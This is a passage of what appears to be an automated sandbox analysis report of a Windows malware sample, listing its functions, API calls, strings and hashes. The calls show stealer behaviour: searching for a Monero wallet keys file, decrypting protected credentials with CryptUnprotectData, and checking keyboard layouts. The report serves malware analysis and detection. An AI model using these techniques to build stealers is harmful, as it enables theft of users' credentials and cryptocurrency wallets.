                          • Instruction Fuzzy Hash: 05B204F36082049FE3046E2DEC8567ABBE9EFD4720F1A493DE6C4C7744EA3598058697
                          Function 0061DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006314B0,00630C2A), ref: 0061DAEB
                          • StrCmpCA.SHLWAPI(?,006314B4), ref: 0061DB33
                          • StrCmpCA.SHLWAPI(?,006314B8), ref: 0061DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0061DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: a413e0819028189fb09a693575bb1fd6d68afaa47d83afca38e0d0afe251dd29
                          • Instruction ID: da8985cb7d86ce4cf22513da661b114af455bb029f09e94d09b73e048b1dd8de
                          • Opcode Fuzzy Hash: a413e0819028189fb09a693575bb1fd6d68afaa47d83afca38e0d0afe251dd29
                          • Instruction Fuzzy Hash: A29124769005149BCB54FBB0EC969ED737FAF88300F40866CF90696181EE749B498F97
                          Function 00627B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,006305AF), ref: 00627BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00627BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00627C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00627C62
                          • LocalFree.KERNEL32(00000000), ref: 00627D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: d0c3e1a712504e971edff5bb840f7f84e1d2717e97bd82daff61ccac605d7b17
                          • Instruction ID: b2c83e3205ea87e06a41eef493324eb505e37b33d48445645ce28dbaf6388c42
                          • Opcode Fuzzy Hash: d0c3e1a712504e971edff5bb840f7f84e1d2717e97bd82daff61ccac605d7b17
                          • Instruction Fuzzy Hash: 22418F71940628ABCB24DB94EC99FEDB379FF48700F2042D9E00962281DB742F85CFA5
                          Function 009D1F2E Relevance: 10.4, Strings: 7, Instructions: 1646COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +p~o$."K+$:-~w$T&wo$YRD{$k?o~$~30
                          • API String ID: 0-1783079507
                          • Opcode ID: d9cba92aa0c738b829a914f17db3bd5adb17e7b6012129268f30caf196722147
                          • Instruction ID: 0f24e45c153c0e96316e58be8ead46a3e487dc9b9746347daf49d9db6a7f4336
                          • Opcode Fuzzy Hash: d9cba92aa0c738b829a914f17db3bd5adb17e7b6012129268f30caf196722147
                          • Instruction Fuzzy Hash: F6B2E5F3A0C2049FD304AE2DEC8567AFBE5EF94720F164A2DEAC4D3744EA3558058697
                          Function 0061E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00630D73), ref: 0061E4A2
                          • StrCmpCA.SHLWAPI(?,006314F8), ref: 0061E4F2
                          • StrCmpCA.SHLWAPI(?,006314FC), ref: 0061E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8718670a281dbb72213cf5acdd98c4f84aa39c05acc5404abdede2a0223544e9
                          • Instruction ID: b21175a34fd560b740035278e0af09e09fc64d0e337a243156b2d7a306bdf0b9
                          • Opcode Fuzzy Hash: 8718670a281dbb72213cf5acdd98c4f84aa39c05acc5404abdede2a0223544e9
                          • Instruction Fuzzy Hash: 4712A2719105289BDB58FBA0EC96EED733AAF54300F4041ACF50A56081EF746F89CF9A
                          Function 009D04B4 Relevance: 9.1, Strings: 6, Instructions: 1603COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +Y[^$<a/$AQ>=$\$mDKz$r~K
                          • API String ID: 0-4162694993
                          • Opcode ID: 66c2b10807567387c61f29622a6d05dd334f46dd87a8b8e52896a77fa8ba35be
                          • Instruction ID: e964e91f25d3156e9d24d6992c6cc077eabf6442b2b87494cbc2140acc5d4164
                          • Opcode Fuzzy Hash: 66c2b10807567387c61f29622a6d05dd334f46dd87a8b8e52896a77fa8ba35be
                          • Instruction Fuzzy Hash: E2B2D9F390C2109FE304AE29DC8567ABBE9EF94720F16493DEAC9D3744E63598018797
                          Function 009CD092 Relevance: 9.1, Strings: 6, Instructions: 1577COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'Ogw$0#u$?_[{$[7a~$[;x$lH.o
                          • API String ID: 0-1921790539
                          • Opcode ID: bee0c8c8c5da3e1ccf95b6799e63b2b113b6b58db9559598ca032669dece16f6
                          • Instruction ID: 757c1fdf15e2f32fdbd6efd092eb6d78a954c15441f345cea10fb3b177e1a6e0
                          • Opcode Fuzzy Hash: bee0c8c8c5da3e1ccf95b6799e63b2b113b6b58db9559598ca032669dece16f6
                          • Instruction Fuzzy Hash: 4BB209F3A0C6109FE304AE29EC8567AF7E5EF94720F16893DEAC4C3744E63598058697
                          Function 00619AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00614EEE,00000000,?), ref: 00619B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Na,00000000,00000000), ref: 00619B2A
                          • LocalFree.KERNEL32(?,?,?,?,00614EEE,00000000,?), ref: 00619B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID: Na
                          • API String ID: 4291131564-2961090521
                          • Opcode ID: 42a445752a22f0de29819434853911c1189ad849f348e45e3faf1ad605fb25a9
                          • Instruction ID: 78471a27ce8be8cc0af4eaf12621926f3b3a27d0d41ff3a84cbe8ef4bcc31b1b
                          • Opcode Fuzzy Hash: 42a445752a22f0de29819434853911c1189ad849f348e45e3faf1ad605fb25a9
                          • Instruction Fuzzy Hash: 5B11A2B4240308AFEB14CF64DC95FAA77B5FB89701F208159FA159B390C7B6A941CBA0
                          Function 0061C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0061C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0061C87C
                          • lstrcat.KERNEL32(?,00630B46), ref: 0061C943
                          • lstrcat.KERNEL32(?,00630B47), ref: 0061C957
                          • lstrcat.KERNEL32(?,00630B4E), ref: 0061C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 186e8469670939deef3c846a54d29736794c1609e23da01853dbae2bc790692d
                          • Instruction ID: d73d828323c55e2cce0c7642a8e2a914f24626da41311db3d2ed0997977e34b7
                          • Opcode Fuzzy Hash: 186e8469670939deef3c846a54d29736794c1609e23da01853dbae2bc790692d
                          • Instruction Fuzzy Hash: 2341A0B4D0431ADFDB10CFA0DD88BEEF7B9BB48304F1446A8E509A6280D7745A84CF91
                          Function 00626920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0062696C
                          • sscanf.NTDLL ref: 00626999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006269B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006269C0
                          • ExitProcess.KERNEL32 ref: 006269DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: edfc05308c5ffadd35e07ec492040527f789b9058fa1aac0fe545df63b2b926b
                          • Instruction ID: 24ea5e0ad280b98c5a39f60fd129445c71181fdf9069abb384cbe6e2e16c7e78
                          • Opcode Fuzzy Hash: edfc05308c5ffadd35e07ec492040527f789b9058fa1aac0fe545df63b2b926b
                          • Instruction Fuzzy Hash: DD21EB75D10219ABCF08EFE4E9859EEB7B6BF48301F04852EE406E3250EB345604CB69
                          Function 00617240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0061724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00617254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00617281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006172A4
                          • LocalFree.KERNEL32(?), ref: 006172AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: fe37f9d6d9ee11f7bbf2dd7fd2255fc673cfde5587a2e0f5e9d990c177171ce8
                          • Instruction ID: b43e07766203b804901b8fe4891e1fcc34676b9696e80cbce762bf167bafa942
                          • Opcode Fuzzy Hash: fe37f9d6d9ee11f7bbf2dd7fd2255fc673cfde5587a2e0f5e9d990c177171ce8
                          • Instruction Fuzzy Hash: 53010075A40308BBEB14DFD4CD85F9D77B9BB44701F104154FB05AB2C0D674AA018B65
                          Function 00629600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0062961E
                          • Process32First.KERNEL32(00630ACA,00000128), ref: 00629632
                          • Process32Next.KERNEL32(00630ACA,00000128), ref: 00629647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0062965C
                          • CloseHandle.KERNEL32(00630ACA), ref: 0062967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
